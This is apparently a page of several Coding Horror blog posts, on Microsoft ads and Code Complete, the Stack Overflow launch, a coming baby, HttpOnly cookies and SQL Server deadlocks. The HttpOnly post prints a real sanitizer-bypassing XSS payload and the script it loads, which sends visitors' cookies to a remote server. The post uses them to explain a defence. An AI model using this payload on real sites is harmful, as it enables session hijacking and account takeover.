Coding Horror

programming and human factors

Bill Gates and Code Complete

By now I’m sure you’ve at least heard of, if not already seen, the new Windows Vista advertisements featuring Bill Gates and Jerry Seinfeld. They haven’t been well received, to put it mildly, but the latest commercial is actually not bad in its longer 4 minute version:

On the whole, I’d call these ads opaque bordering on inane. Rumor has it the entire thing has been cancelled. It wasn’t entirely unsuccessful, I suppose; the goal of advertising is to get people talking about it. Even if every one of those conversations starts with "what the hell were they thinking ", hey -- it’s a conversation. About an ad. The ad agencies have won.

I guess Microsoft figured it had to do something to counter the long running "I’m a Mac, I’m a PC " ads from Apple. I secretly love these ads, because the hidden subtext is that if you use a PC, you’re as cool as John Hodgman:

My problem with these ads begins with the casting. As the Mac character, Justin Long (who was in the forgettable movie Dodgeball and the forgettabler TV show Ed) is just the sort of unshaven, hoodie-wearing, hands-in-pockets hipster we’ve always imagined when picturing a Mac enthusiast. He’s perfect. Too perfect. It’s like Apple is parodying its own image while also cementing it. If the idea was to reach out to new types of consumers (the kind who aren’t already evangelizing for Macs), they ought to have used a different type of actor.

Meanwhile, the PC is played by John Hodgman -- contributor to The Daily Show and This American Life, host of an amusing lecture series, and all-around dry-wit extraordinaire. Even as he plays the chump in these Apple spots, his humor and likability are evident. (Look at that hilariously perfect pratfall he pulls off in the spot titled "Viruses. ") The ads pose a seemingly obvious question -- would you rather be the laid-back young dude or the portly old dweeb? -- but I found myself consistently giving the "wrong " answer: I’d much sooner associate myself with Hodgman than with Long.

The sleight of hand breaks down a bit when you realize that Hodgman actually uses Macs, but that’s advertising for you: a giant pack of lies. In other breaking news, water still wet, sky still blue.

The reason I bring this up is not to fan the eternal flame of platform wars, but to highlight one interesting little detail in the ad. At about 1:05, you’ll see Gates reading a bedtime story to the family’s son from some obscure technical tome or other. But not just any technical tome -- he’s reading from the book that this very blog is named after, my all-time favorite programming book, Steve McConnell’s Code Complete.

You can use [the table driven method] approach in any object-oriented language. It’s less error-prone, more maintainable and more efficient than lengthy if statements, case statements or copious subclasses. The fact that a design uses inheritance and polymorphism doesn’t make it a good design. The rote object-oriented design described earlier in the "Object-Oriented Approach " section would require as much code as a rote functional design -- or more.

The above is excerpted from Chapter 18 of "Table-Driven Methods ", on page 423. You might argue that I have an unhealthy fascination with Steve McConnell and Code Complete. You wouldn’t be wrong.

I’m probably preaching to the choir here, but I doubt it’s a coincidence that Gates chose that particular book; I’m sure it’s one of his all time favorite books, too.

Hat tip to Matthew Eckstein for pointing this one out!

Discussion

Stack Overflow: None of Us is as Dumb as All of Us

I'm in no way trying to conflate this with the meaning of my last blog post, but after a six month gestation, we just gave birth to a public website.

Stack Overflow: none of us is as dumb as all of us

Of course, I'm making a sly little joke here about community, but I really believe in this stuff. Stack Overflow is, as much as I could make it, an effort of collective programmer community.

Here's the original vision statement for Stack Overflow from back in April:

So what is stackoverflow?

From day one, my blog has been about putting helpful information out into the world. I never had any particular aspirations for this blog to become what it is today; I'm humbled and gratified by its amazing success. It has quite literally changed my life. Blogs are fantastic resources, but as much as I might encourage my fellow programmers to blog, not everyone has the time or inclination to start a blog. There's far too much great programming information trapped in forums, buried in online help, or hidden away in books that nobody buys any more. We'd like to unlock all that. Let's create something that makes it easy to participate, and put it online in a form that is trivially easy to find.

Are you familiar with the movie pitch formula?

Stackoverflow is sort of like the anti-experts-exchange (minus the nausea-inducing sleaze and quasi-legal search engine gaming) meets wikipedia meets programming reddit. It is by programmers, for programmers, with the ultimate intent of collectively increasing the sum total of good programming knowledge in the world. No matter what programming language you use, or what operating system you call home. Better programming is our goal.

Although reaction has generally been positive, there has been a bit of backlash. Some have promoted the idea that Stack Overflow will only contribute to the increasing dumbenation of the world's developers. I think this is, in a word, horsecrap. I liked Joel's response to this in podcast 21 (mp3):

And it is true that we are all, as developers, hopelessly incompetent. The goal of a site like Stack Overflow is to somehow share the correct knowledge wherever it may be as it is scattered throughout the universe, and to cause that to be voted up and to be spread amongst us. There's this big universe of dumb programmers, and I'm one of them, and we all have a little bit of knowledge. I may know how to do this thing in VB6 which may be useful to somebody one day who's trying to maintain some ridiculously old piece of crap code. We all have these little tiny pieces of information and if we can just contribute a little bit, that information gets amplified, and maybe a thousand other dumb developers will benefit from my one little piece of good information.

And here's my response, from the same podcast episode, to all those who turn up their noses at community sites like this, preferring the input of "experts":

The idea that you have all these experts waiting in the wings to do stuff is an illusion in my experience. There's really just a bunch of amateurs muddling along trying to do things together. The people that are truly experts are too busy to even help, right? And if the experts are too busy to help, what difference does it really make if there are experts at all. Because the whole point of this endeavor is helping other developers, and whether you're an expert or not, if you have no time to help, you're not really contributing to the solution.

Stack Overflow is by no means done. We're still technically in public beta. But I believe what we have -- the confluence of wiki, discussion, blog, and reddit/digg ranking systems -- is a fair representation of our original vision for Stack Overflow.

venn diagram: wiki - digg/reddit - blog - forum

It's a place where a busy programmer can invest a few minutes with as little friction as possible, and get something tangible from the community in return.

But who cares what I think; my opinion holds no particular weight. I'm just a member. This is our site. You tell me: how dumb are we?

Discussion

Spawning a New Process

I don't usually talk about my personal life here, but I have to make an exception in this case.

f.etus, 13 weeks, 1 day

I debated for days which geeky reference I would use as a synonym for "we're having a baby". The title is the best I could do. I'm truly sorry.

As an aside, this is something my wife and I have worked at for a number of years, and was only truly possible through the Miracle of Sciencetm. Despite the best of intentions, you really start to resent all those teenage couples who manage to get pregnant so awkwardly and accidentally. Oh, that's right! You have sex! It's so obvious in retrospect!

Not that managing to procreate is anything special compared to programming. Just ask the inestimable Richard Stallman:

It doesn't take special talents to reproduce -- even plants can do it. On the other hand, contributing to a program like Emacs takes real skill. That is really something to be proud of.

It helps more people, too.

At any rate, I'm looking forward to stocking our unborn child's mind with all my insane, crazy ideas. I think Dave Eggers said it best in A Heartbreaking Work of Staggering Genius, describing a road trip he took with his younger brother after the death of his parents:

His brain is my laboratory, my depository. Into it I can stuff the books I choose, the television shows, the movies, my opinion about elected officials, historical events, neighbors, passersby. He is my twenty-four-hour classroom, my captive audience, forced to ingest everything I deem worthwhile. He is a lucky, lucky boy! And no one can stop me. He is mine, and you cannot stop me, cannot stop us. Try to stop us, you pu**y! You can't stop us from singing, and you can't stop us from making fart sounds, from putting our hands out the window to test the aerodynamics of different hand formations, from wiping the contents of our noses under the front of our seats.

We cannot be stopped from looking with pity upon all the world's sorry inhabitants, they unblessed by our charms, unchallenged by our trials, unscarred and thus weak, gelatinous. You cannot stop me from telling Toph to make comments about and faces at the people in the next lane.

It's unfair. The matchups, Us. v. Them (or you) are unfair. We are dangerous. We are daring and immortal. Fog whips up from under the cliffs and billows over the highway. Blue breaks from beyond the fog and sun suddenly screams from the blue.

I guess what I'm trying to say is that, with any luck, he or she will be scarred for life. That's a proud family tradition where I come from.

Discussion

Protecting Your Cookies: HttpOnly

So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?

As it turns out, far more dangerous than expected.

To appreciate just how significant XSS hacks have become, think about how much of your life is lived online, and how exactly the websites you log into on a daily basis know who you are. It's all done with HTTP cookies, right? Those tiny little identifiying headers sent up by the browser to the server on your behalf. They're the keys to your identity as far as the website is concerned.

Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder. So tricksy things like:

<script>alert('hello XSS!');</script>

are automagically converted into their harmless encoded equivalents:

&lt;script&gt;alert('hello XSS!');&lt;/script&gt;

In my friend's defense (not that he deserves any kind of defense) the website he's working on allows some HTML to be posted by users. It's part of the design. It's a difficult scenario, because you can't just clobber every questionable thing that comes over the wire from the user. You're put in the uncomfortable position of having to discern good from bad, and decide what to do with the questionable stuff.

Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.

How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.

<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"

Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here's what that JavaScript looks like:

window.location="http://1.2.3.4:81/r.php?u="
+document.links[1].text
+"&l="+document.links[1]
+"&c="+document.cookie;

That's right -- whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!

As we've already established, once someone has your browser cookies for a given website, they essentially have the keys to the kingdom for your identity there. If you don't believe me, get the Add N Edit cookies extension for Firefox and try it yourself. Log into a website, copy the essential cookie values, then paste them into another browser running on another computer. That's all it takes. It's quite an eye opener.

If cookies are so precious, you might find yourself asking why browsers don't do a better job of protecting their cookies. I know my friend was. Well, there is a way to protect cookies from most malicious JavaScript: HttpOnly cookies.

When you tag a cookie with the HttpOnly flag, it tells the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly forbidden. Of course, this presumes you have:

  1. A modern web browser
  2. A browser that actually implements HttpOnly correctly

The good news is that most modern browsers do support the HttpOnly flag: Opera 9.5, Internet Explorer 7, and Firefox 3. I'm not sure if the latest versions of Safari do or not. It's sort of ironic that the HttpOnly flag was pioneered by Microsoft in hoary old Internet Explorer 6 SP1, a bowser which isn't exactly known for its iron-clad security record.

Regardless, HttpOnly cookies are a great idea, and properly implemented, make huge classes of common XSS attacks much harder to pull off. Here's what a cookie looks like with the HttpOnly flag set:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2008 10:51:08 GMT
Content-Length: 2838

This isn't exactly news; Scott Hanselman wrote about HttpOnly a while ago. I'm not sure he understood the implications, as he was quick to dismiss it as "slowing down the average script kiddie for 15 seconds". In his defense, this was way back in 2005. A dark, primitive time. Almost pre YouTube.

HttpOnly cookies can in fact be remarkably effective. Here's what we know:

  • HttpOnly restricts all access to document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari)
  • HttpOnly removes cookie information from the response headers in XMLHttpObject.getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn't, because there's a bug.
  • XMLHttpObjects may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.

The big security hole, as alluded to above, is that Firefox (and presumably Opera) allow access to the headers through XMLHttpObject. So you could make a trivial JavaScript call back to the local server, get the headers out of the string, and then post that back to an external domain. Not as easy as document.cookie, but hardly a feat of software engineering.

Even with those caveats, I believe HttpOnly cookies are a huge security win. If I -- er, I mean, if my friend -- had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!

HttpOnly cookies don't make you immune from XSS cookie theft, but they raise the bar considerably. It's practically free, a "set it and forget it" setting that's bound to become increasingly secure over time as more browsers follow the example of IE7 and implement client-side HttpOnly cookie security correctly. If you develop web applications, or you know anyone who develops web applications, make sure they know about HttpOnly cookies.

Now I just need to go tell my friend about them. I'm not sure why I bother. He never listens to me anyway.

(Special thanks to Shawn expert developer Simon for his assistance in constructing this post.)

Discussion

Deadlocked!

You may have noticed that my posting frequency has declined over the last three weeks. That's because I've been busy building that Stack Overflow thing we talked about.

It's going well so far. Joel Spolsky also seems to think it's going well, but he's one of the founders so he's clearly biased. For what it's worth, Robert Scoble was enthused about Stack Overflow, though it did not make him cry. Still, I was humbled by the way Robert picked this up so enthusiastically through the community. I hadn't contacted him in any way; I myself only found out about his reaction third hand.

That's not to say everything has been copacetic. One major surprise in the development of Stack Overflow was this recurring and unpredictable gem:

Transaction (Process ID 54) was deadlocked on lock resources with another process and has been chosen as the deadlock victim. Rerun the transaction.

Deadlocks are a classic computer science problem, often taught to computer science students as the Dining Philosophers puzzle.

dining-philosophers-problem-comic.

Five philosophers sit around a circular table. In front of each philosopher is a large plate of rice. The philosophers alternate their time between eating and thinking. There is one chopstick between each philosopher, to their immediate right and left. In order to eat, a given philosopher needs to use both chopsticks. How can you ensure all the philosophers can eat reliably without starving to death?

Point being, you have two processes that both need access to scarce resources that the other controls, so some sort of locking is in order. Do it wrong, and you have a deadlock -- everyone starves to death. There are lots of scarce resources in a PC or server, but this deadlock is coming from our database, SQL Server 2005.

You can attach the profiler to catch the deadlock event and see the actual commands that are deadlocking. I did that, and found there was always one particular SQL command involved:

UPDATE [Posts]
SET [AnswerCount] = @p1, [LastActivityDate] = @p2, [LastActivityUserId] = @p3
WHERE [Id] = @p0

If it detects a deadlock, SQL Server forces one of the deadlocking commands to lose -- specifically the one that uses the least resources. The statement on the losing side varied, but in our case the losing deadlock statement was always a really innocuous database read, like so:

SELECT *
FROM [Posts]
WHERE [ParentId] = @p0

(Disclaimer: above SQL is simplified for the purpose of this post). This deadlock perplexed me, on a couple levels.

  1. How can a read be blocked by a write? What possible contention could there be from merely reading the data? It's as if one of the dining philosophers happened to glance over at another philosoper's plate, and the other philosopher, seeing this, screamed "meal viewing deadlock!" and quickly covered his plate with his hands. Yes, it's ridiculous. I don't want to eat your food -- I just want to look at it.

  2. We aren't doing that many writes. Like most web apps, we're insanely read-heavy. The particular SQL statement you see above only occurs when someone answers a question. As much as I want to believe Stack Overflow will be this massive, rip-roaring success, there just cannot be that many answers flowing through the system in beta. We went through our code with a fine tooth comb, and yep, we're barely writing anywhere except when users ask a question, edit something, or answer a question.

  3. What about retries? I find it hard to believe that little write would take so incredibly long that a read would have to wait more than a few milliseconds at most.

If you aren't eating -- modifying data -- then how can trivial super-fast reads be blocked on rare writes? We've had good results with SQL Server so far, but I found this behavior terribly disappointing. Although these deadlocks were somewhat rare, they still occurred a few times a day, and I'm deeply uncomfortable with errors I don't fully understand. This is the kind of stuff that quite literally keeps me up at night.

I'll freely admit this could be due to some peculiarities in our code (translated: we suck), and reading through some sample SQL traces of subtle deadlock conditions, it's certainly possible. We racked our brains and our code, and couldn't come up with any obvious boneheaded mistakes. While our database is somewhat denormalized, all of our write conditions are relatively rare and hand-optimized to be small and fast. In all honesty, our app is just not all that complex. It ain't rocket surgery.

If you ever have to troubleshoot database deadlocks, you'll inevitably discover the NOLOCK statement. It works like this:

SELECT *
FROM [Posts] with (nolock)
WHERE [ParentId] = @p0

It isn't just a SQL Server command -- it also applies to Oracle and MySQL. This sets the transaction isolation level to read uncommitted, also known as "dirty reads". It tells the query to use the lowest possible levels of locking.

But is nolock dangerous? Could you end up reading invalid data with read uncommitted on? Yes, in theory. You'll find no shortage of database architecture astronauts who start dropping ACID science on you and all but pull the building fire alarm when you tell them you want to try nolock. It's true: the theory is scary. But here's what I think:

In theory there is no difference between theory and practice. In practice there is.

I would never recommend using nolock as a general "good for what ails you" snake oil fix for any database deadlocking problems you may have. You should try to diagnose the source of the problem first.

But in practice adding nolock to queries that you absolutely know are simple, straightforward read-only affairs never seems to lead to problems. I asked around, and I got advice from a number of people whose opinions and experience I greatly trust and they, to a (wo)man, all told me the same thing: they've never seen any adverse reaction when using nolock. As long as you know what you're doing. One related a story of working with a DBA who told him to add nolock to every query he wrote!

With nolock / read uncommitted / dirty reads, data may be out of date at the time you read it, but it's never wrong or garbled or corrupted in a way that will crash you. And honestly, most of the time, who cares? If your user profile page is a few seconds out of date, how could that possibly matter?

Adding nolock to every single one of our queries wasn't really an option. We added it to all the ones that seemed safe, but our use of LINQ to SQL made it difficult to apply the hint selectively.

I'm no DBA, but it seems to me the root of our problem is that the default SQL Server locking strategy is incredibly pessimistic out of the box:

The database philosophically expects there will be many data conflicts; with multiple sessions all trying to change the same data at the same time and corruption will result. To avoid this, Locks are put in place to guard data integrity ... there are a few instances though, when this pessimistic heavy lock design is more of a negative than a positive benefit, such as applications that have very heavy read activity with light writes.

Wow, very heavy read activity with light writes. What does that remind me of? Hmm. Oh yes, that damn website we're building. Fortunately, there is a mode in SQL Server 2005 designed for exactly this scenario: read committed snapshot:

Snapshots rely on an entirely new data change tracking method ... more than just a slight logical change, it requires the server to handle the data physically differently. Once this new data change tracking method is enabled, it creates a copy, or snapshot of every data change. By reading these snapshots rather than live data at times of contention, Shared Locks are no longer needed on reads, and overall database performance may increase.

I'm a little disappointed that SQL Server treats our silly little web app like it's a banking application. I think it's incredibly telling that a Google search for SQL Server deadlocks returns nearly twice the results of a query for MySql deadlocks. I'm guessing that MySQL, which grew up on web apps, is much less pessimistic out of the box than SQL Server.

I find that deadlocks are difficult to understand and even more difficult to troubleshoot. Fortunately, it's easy enough to fix by setting read committed snapshot on the database for our particular workload. But I can't help thinking our particular database vendor just isn't as optimistic as they perhaps should be.

Discussion